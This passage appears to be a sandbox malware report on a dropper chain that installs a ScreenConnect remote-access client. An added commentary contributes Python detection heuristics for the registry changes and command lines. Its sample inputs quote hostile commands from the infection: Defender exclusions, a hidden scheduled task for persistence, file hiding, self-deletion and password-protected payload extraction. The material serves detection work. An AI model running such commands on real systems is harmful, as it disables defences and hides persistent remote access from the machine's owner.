Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | InstallUtil.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 8ZVMneG.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsiExec.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 6c81dae2fe.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | skotes.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 8ZVMneG.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ScreenConnect.ClientService.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rundll32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | c59adc6d69.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 68c2153f03.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | UZAj8wc.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
7004 | powershell.exe
2140 | PING.EXE
5456 | powershell.exe
5076 | PING.EXE
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 4b8d248ac5a44344a64afd9f747a9e45.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 4b8d248ac5a44344a64afd9f747a9e45.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | ScreenConnect.WindowsClient.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | ScreenConnect.WindowsClient.exe
Delays execution with timeout.exe 1 IoCs
pid | Process
6700 | timeout.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Modifies data under HKEY_USERS 13 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | ScreenConnect.ClientService.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | ScreenConnect.WindowsClient.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | ScreenConnect.WindowsClient.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | ScreenConnect.ClientService.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | ScreenConnect.ClientService.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | ScreenConnect.ClientService.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | msiexec.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | ScreenConnect.WindowsClient.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | ScreenConnect.WindowsClient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | ScreenConnect.ClientService.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | ScreenConnect.WindowsClient.exe
Modifies registry class 37 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductName = "ScreenConnect Client (98a59bd0eed9222b)" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C} | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\ = "ScreenConnect Client (98a59bd0eed9222b) Credential Provider" | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Version = "402849799" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AuthorizedLUAApp = "0" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC\Full | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Assignment = "1" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media\1 = ";" | msiexec.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Clients = 3a0000000000 | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductIcon = "C:\\Windows\\Installer\\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\\DefaultIcon" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2\D32D1EE57AD9200EF07A7D4C08AB00DC | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b\shell\open\command | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\UseOriginalUrlEncoding = "1" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\PackageCode = "D32D1EE57AD9200EF07A7D4C08AB00DC" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AdvertiseFlags = "388" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\InstanceType = "0" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\DeploymentFlags = "3" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2 | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" | msiexec.exe
-
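What the two registry lists above record is msiexec, started by a dropped binary in the user's Temp directory (see ga70pjP.exe in the process tree), installing a ScreenConnect client: it registers COM class {6FF59A85-BC37-4CD4-03BC-F8663411820C} with ScreenConnect.WindowsCredentialProvider.dll as its in-process server, the sc-98a59bd0eed9222b URL protocol with ScreenConnect.WindowsClient.exe as its handler, and ZoneMap values under the .DEFAULT profile. ScreenConnect is legitimate remote-support software, so the signal is the delivery path, not the product. Note also that the list shows only the COM registration; a credential provider is activated by a separate entry under Authentication\Credential Providers, which this report does not show. The Python below is an added example, not part of the sandbox report: it parses lines in the report's own one-line layout and applies four heuristics of its own to pull out exactly those entries. SAMPLE_EVENTS are copied from the lists above and are constructed test input.

```python
"""Triage pass over registry events printed the way this report prints them.

Added example, not part of the sandbox report.  Each line has the layout
    <operation> <path>[ = <value>] <process>
and the four rules in triage() are this example's own heuristics: a COM
in-process server outside C:\\Windows, a new URL protocol handler and its
shell\\open\\command, and ZoneMap values written to the .DEFAULT profile.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

OPS = ("Key created", "Key deleted", "Set value (str)", "Set value (int)", "Set value (data)")
SEP = "\\"

Finding = Tuple[str, str, str]  # (rule, detail, writing process)


@dataclass
class RegEvent:
    op: str
    path: str             # key/value path exactly as printed, without the process name
    value: Optional[str]  # decoded value for "Set value" lines, None for key create/delete
    process: str          # the last whitespace-separated token on the line


def _decode(raw: str) -> str:
    """Strip the report's surrounding quotes and undo its \\" and \\\\ escaping."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        raw = raw[1:-1]
    return raw.replace('\\"', '"').replace('\\\\', '\\')


def parse_event(line: str) -> RegEvent:
    """Split one report line into operation, path, decoded value and process."""
    line = line.strip()
    op = next((o for o in OPS if line.startswith(o)), None)
    if op is None:
        raise ValueError(f"unrecognised registry operation: {line[:40]!r}")
    # The process name never contains spaces; the path may ("URL Protocol").
    body, _, process = line[len(op):].strip().rpartition(" ")
    if " = " in body:
        path, _, raw = body.partition(" = ")
        return RegEvent(op, path, _decode(raw), process)
    return RegEvent(op, body, None, process)


def triage(events: List[RegEvent]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        path = ev.path.rstrip(SEP)
        parts = path.split(SEP)
        low = path.lower()
        if ev.op == "Set value (str)" and low.endswith(SEP + "inprocserver32") and ev.value:
            # Default value of InprocServer32 is the DLL COM loads for this CLSID.
            if not ev.value.lower().startswith("c:\\windows\\"):
                findings.append(("com_server_outside_windows", f"{parts[-2]} -> {ev.value}", ev.process))
        elif low.endswith(SEP + "url protocol"):
            # The mere presence of "URL Protocol" turns a ProgID into a URI scheme handler.
            findings.append(("url_protocol_registered", parts[-2], ev.process))
        elif low.endswith(SEP + "shell" + SEP + "open" + SEP + "command") and ev.value:
            findings.append(("protocol_handler_command", f"{parts[-4]}: {ev.value}", ev.process))
        elif (low.startswith("\\registry\\user\\.default\\")
              and "\\internet settings\\zonemap\\" in low
              and ev.op.startswith("Set value")):
            # .DEFAULT is the profile services run under; these values relax intranet zone checks.
            findings.append(("default_profile_zonemap_change", f"{parts[-1]}={ev.value}", ev.process))
    return findings


def triage_lines(lines: List[str]) -> List[Finding]:
    return triage([parse_event(line) for line in lines])


# Copied from the registry IoC lists in this report (constructed test input, not live telemetry).
SAMPLE_EVENTS = [
    r'Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe',
    r'Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 msiexec.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol msiexec.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" msiexec.exe',
]

SAMPLE_FINDINGS = triage_lines(SAMPLE_EVENTS)

if __name__ == "__main__":
    for rule, detail, proc in SAMPLE_FINDINGS:
        print(f"{rule:32} {proc:32} {detail}")
```

Run against the seven sample lines, the pass reports the ZoneMap ProxyBypass write, the credential-provider DLL under Program Files (x86), the sc-98a59bd0eed9222b scheme and its handler command, and ignores the Windows Installer bookkeeping. The InprocServer32 rule deliberately keys on the value write, not the key creation, because only the default value tells you which DLL will be loaded.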
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2140 PING.EXE 5076 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6088 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1868 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe 1868 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe 4612 skotes.exe 4612 skotes.exe 4028 NN9Dd7c.exe 804 powershell.exe 804 powershell.exe 1936 powershell.exe 1936 powershell.exe 4848 INOKWGC.exe 4848 INOKWGC.exe 4848 INOKWGC.exe 2904 4b8d248ac5a44344a64afd9f747a9e45.exe 2904 4b8d248ac5a44344a64afd9f747a9e45.exe 4652 msedge.exe 4652 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 3940 UZAj8wc.exe 3940 UZAj8wc.exe 3940 UZAj8wc.exe 3940 UZAj8wc.exe 6672 skotes.exe 6672 skotes.exe 5228 identity_helper.exe 5228 identity_helper.exe 4988 msiexec.exe 4988 msiexec.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 5764 ScreenConnect.ClientService.exe 4688 powershell.exe 4688 powershell.exe 4688 powershell.exe 6868 7796213aa8.exe 6868 7796213aa8.exe 3940 UZAj8wc.exe 3940 UZAj8wc.exe 5544 InstallUtil.exe 5544 InstallUtil.exe 3220 4ba8da5cdc.exe 3220 4ba8da5cdc.exe 6680 3573f91eb8.exe 6680 3573f91eb8.exe 3760 c1e8d0e648.exe 3760 c1e8d0e648.exe 1540 4913480162.exe 1540 4913480162.exe 6460 skotes.exe 6460 skotes.exe 1540 4913480162.exe 1540 4913480162.exe 1540 4913480162.exe 1540 4913480162.exe 324 svchost.exe 324 svchost.exe 324 svchost.exe 324 svchost.exe 3508 804a4385fd.exe 3508 804a4385fd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process (identical rows collapsed; ×N is the repeat count, 64 rows in total)
Token: SeDebugPrivilege | 4028 | NN9Dd7c.exe
Token: SeDebugPrivilege | 804 | powershell.exe
Token: SeDebugPrivilege | 1684 | ga70pjP.exe
Token: SeDebugPrivilege | 1936 | powershell.exe
Token: SeSecurityPrivilege | 4988 | msiexec.exe
Token: SeShutdownPrivilege | 1864 | msiexec.exe | ×3
Token: SeIncreaseQuotaPrivilege | 1864 | msiexec.exe | ×3
Token: SeCreateTokenPrivilege | 1864 | msiexec.exe | ×2
Token: SeAssignPrimaryTokenPrivilege | 1864 | msiexec.exe | ×2
Token: SeLockMemoryPrivilege | 1864 | msiexec.exe | ×2
Token: SeMachineAccountPrivilege | 1864 | msiexec.exe | ×2
Token: SeTcbPrivilege | 1864 | msiexec.exe | ×2
Token: SeSecurityPrivilege | 1864 | msiexec.exe | ×2
Token: SeTakeOwnershipPrivilege | 1864 | msiexec.exe | ×2
Token: SeLoadDriverPrivilege | 1864 | msiexec.exe | ×2
Token: SeSystemProfilePrivilege | 1864 | msiexec.exe | ×2
Token: SeSystemtimePrivilege | 1864 | msiexec.exe | ×2
Token: SeProfSingleProcessPrivilege | 1864 | msiexec.exe | ×2
Token: SeIncBasePriorityPrivilege | 1864 | msiexec.exe | ×2
Token: SeCreatePagefilePrivilege | 1864 | msiexec.exe | ×2
Token: SeCreatePermanentPrivilege | 1864 | msiexec.exe | ×2
Token: SeBackupPrivilege | 1864 | msiexec.exe | ×2
Token: SeRestorePrivilege | 1864 | msiexec.exe | ×2
Token: SeDebugPrivilege | 1864 | msiexec.exe | ×2
Token: SeAuditPrivilege | 1864 | msiexec.exe | ×2
Token: SeSystemEnvironmentPrivilege | 1864 | msiexec.exe | ×2
Token: SeChangeNotifyPrivilege | 1864 | msiexec.exe | ×2
Token: SeRemoteShutdownPrivilege | 1864 | msiexec.exe | ×2
Token: SeUndockPrivilege | 1864 | msiexec.exe | ×2
Token: SeSyncAgentPrivilege | 1864 | msiexec.exe | ×2
Token: SeEnableDelegationPrivilege | 1864 | msiexec.exe | ×2
Token: SeManageVolumePrivilege | 1864 | msiexec.exe | ×2
Token: SeImpersonatePrivilege | 1864 | msiexec.exe | ×2
Token: SeCreateGlobalPrivilege | 1864 | msiexec.exe
-
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 1868 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe 1864 msiexec.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 1864 msiexec.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe 4108 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 5544 InstallUtil.exe 5200 057af55804f941a1bfb3623a361b7ab9.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (identical rows collapsed; ×N is the repeat count, 64 rows in total)
PID 1868 wrote to memory of 4612 | 1868 | 055c34101c332838618fdedb730655f61b97553c5e56df94efd373667a3db895.exe | 82 | ×3
PID 4612 wrote to memory of 4028 | 4612 | skotes.exe | 85 | ×3
PID 4028 wrote to memory of 804 | 4028 | NN9Dd7c.exe | 89 | ×3
PID 4612 wrote to memory of 1684 | 4612 | skotes.exe | 92 | ×3
PID 4028 wrote to memory of 1936 | 4028 | NN9Dd7c.exe | 93 | ×3
PID 1684 wrote to memory of 1864 | 1684 | ga70pjP.exe | 95 | ×3
PID 4988 wrote to memory of 4916 | 4988 | msiexec.exe | 98 | ×3
PID 4916 wrote to memory of 1460 | 4916 | MsiExec.exe | 99 | ×3
PID 4612 wrote to memory of 4848 | 4612 | skotes.exe | 104 | ×3
PID 4028 wrote to memory of 2904 | 4028 | NN9Dd7c.exe | 105 | ×3
PID 4028 wrote to memory of 5052 | 4028 | NN9Dd7c.exe | 106 | ×2
PID 4612 wrote to memory of 1784 | 4612 | skotes.exe | 107 | ×3
PID 1784 wrote to memory of 540 | 1784 | 8ZVMneG.exe | 109 | ×3
PID 1784 wrote to memory of 656 | 1784 | 8ZVMneG.exe | 110 | ×9
PID 5052 wrote to memory of 4108 | 5052 | cfe32a70b98540d9861909672f4b70a8.exe | 111 | ×2
PID 4108 wrote to memory of 804 | 4108 | msedge.exe | 112 | ×2
PID 4108 wrote to memory of 4520 | 4108 | msedge.exe | 113 | ×13
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 6368 attrib.exe 4876 attrib.exe 1908 attrib.exe
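The command lines in the process tree below are where several of these signatures come from: powershell Add-MpPreference -ExclusionPath for the drop directories and for C:\ProgramData, attrib +H and +H +S on dropped executables, a schtasks task named Intel_PTT_EK_Recertification that runs a Roaming-profile binary every minute, cmd /c timeout ... & del and powershell ping 127.0.0.1; del in.exe as delay-then-delete clean-up, and 7z.exe e file.zip -p<password> for a staged payload. As an added example (not part of the sandbox report, and not a Sigma or EDR rule set), the Python below applies regex heuristics of its own to command lines copied from the tree and shows which behaviour each one trips; the argument spellings it accepts are only the ones seen in this report.

```python
"""Command-line triage for the behaviours in this report's process tree.

Added example, not part of the sandbox report.  Each rule is a regex
heuristic of this example's own, written against the command lines the
tree shows; production rules would need to cover more argument spellings.
"""
import re
from typing import Callable, List, Optional, Tuple

Finding = Tuple[str, str]  # (rule name, detail)


def defender_exclusion(cmd: str) -> Optional[str]:
    """powershell Add-MpPreference -ExclusionPath <dir>: a Defender blind spot for the drop dir."""
    m = re.search(r'Add-MpPreference\s+-ExclusionPath\s+"?([^"\s]+)', cmd, re.I)
    return f"Defender exclusion added for {m.group(1)}" if m else None


def scheduled_task_created(cmd: str) -> Optional[str]:
    """schtasks /create: report task name, target and schedule."""
    if not re.search(r'\bschtasks(?:\.exe)?\b.*?/create\b', cmd, re.I):
        return None
    tn = re.search(r'/tn\s+"?([^"\s]+)', cmd, re.I)
    tr = re.search(r'/tr\s+(?:"([^"]+)"|(\S+))', cmd, re.I)
    sc = re.search(r'/sc\s+(\w+)', cmd, re.I)
    name = tn.group(1) if tn else "?"
    target = (tr.group(1) or tr.group(2)) if tr else "?"
    schedule = sc.group(1).upper() if sc else "?"
    return f"{name} -> {target} (/SC {schedule})"


def hidden_executable(cmd: str) -> Optional[str]:
    """attrib +H [+S] <file.exe>: hide a dropped binary from a casual directory listing."""
    m = re.search(r'\battrib(?:\.exe)?\s+((?:\+[HS]\s+)+)"?(.+?\.exe)"?\s*$', cmd, re.I)
    return f"attrib {m.group(1).strip()} on {m.group(2)}" if m else None


def delayed_self_delete(cmd: str) -> Optional[str]:
    """timeout or ping used as a sleep, then del of an executable: dropper clean-up."""
    m = re.search(r'\b(?:timeout|ping)\b.*?\bdel\s+(?:/[fq]\s+)*"?([^"&;\s]+\.exe)', cmd, re.I)
    return f"{m.group(1)} deleted after delay" if m else None


def password_protected_archive(cmd: str) -> Optional[str]:
    """7z e <archive> -p<password>: staged payload with the password on the command line."""
    m = re.search(r'\b7z(?:\.exe)?\s+[ex]\s+(\S+)(?:\s+\S+)*?\s+-p(\S+)', cmd, re.I)
    return f"{m.group(1)} extracted with embedded password {m.group(2)}" if m else None


RULES: List[Tuple[str, Callable[[str], Optional[str]]]] = [
    ("defender_exclusion", defender_exclusion),
    ("scheduled_task_created", scheduled_task_created),
    ("hidden_executable", hidden_executable),
    ("delayed_self_delete", delayed_self_delete),
    ("password_protected_archive", password_protected_archive),
]


def triage(cmdlines: List[str]) -> List[Finding]:
    """Run every rule over every command line; one finding per (line, rule) hit."""
    findings: List[Finding] = []
    for cmd in cmdlines:
        for name, rule in RULES:
            detail = rule(cmd)
            if detail:
                findings.append((name, detail))
    return findings


# Copied from the process tree in this report (constructed test input, not live telemetry).
SAMPLE_CMDLINES = [
    r'"powershell.exe" Add-MpPreference -ExclusionPath "C:\pppkes"',
    r'"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"',
    r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\pppkes\4b8d248ac5a44344a64afd9f747a9e45.exe" & rd /s /q "C:\ProgramData\T0HDJM7QQ9RI" & exit',
    r'7z.exe e file.zip -p24291711423417250691697322505 -oextracted',
    r'7z.exe e extracted/file_7.zip -oextracted',
    r'attrib +H "in.exe"',
    r'attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe',
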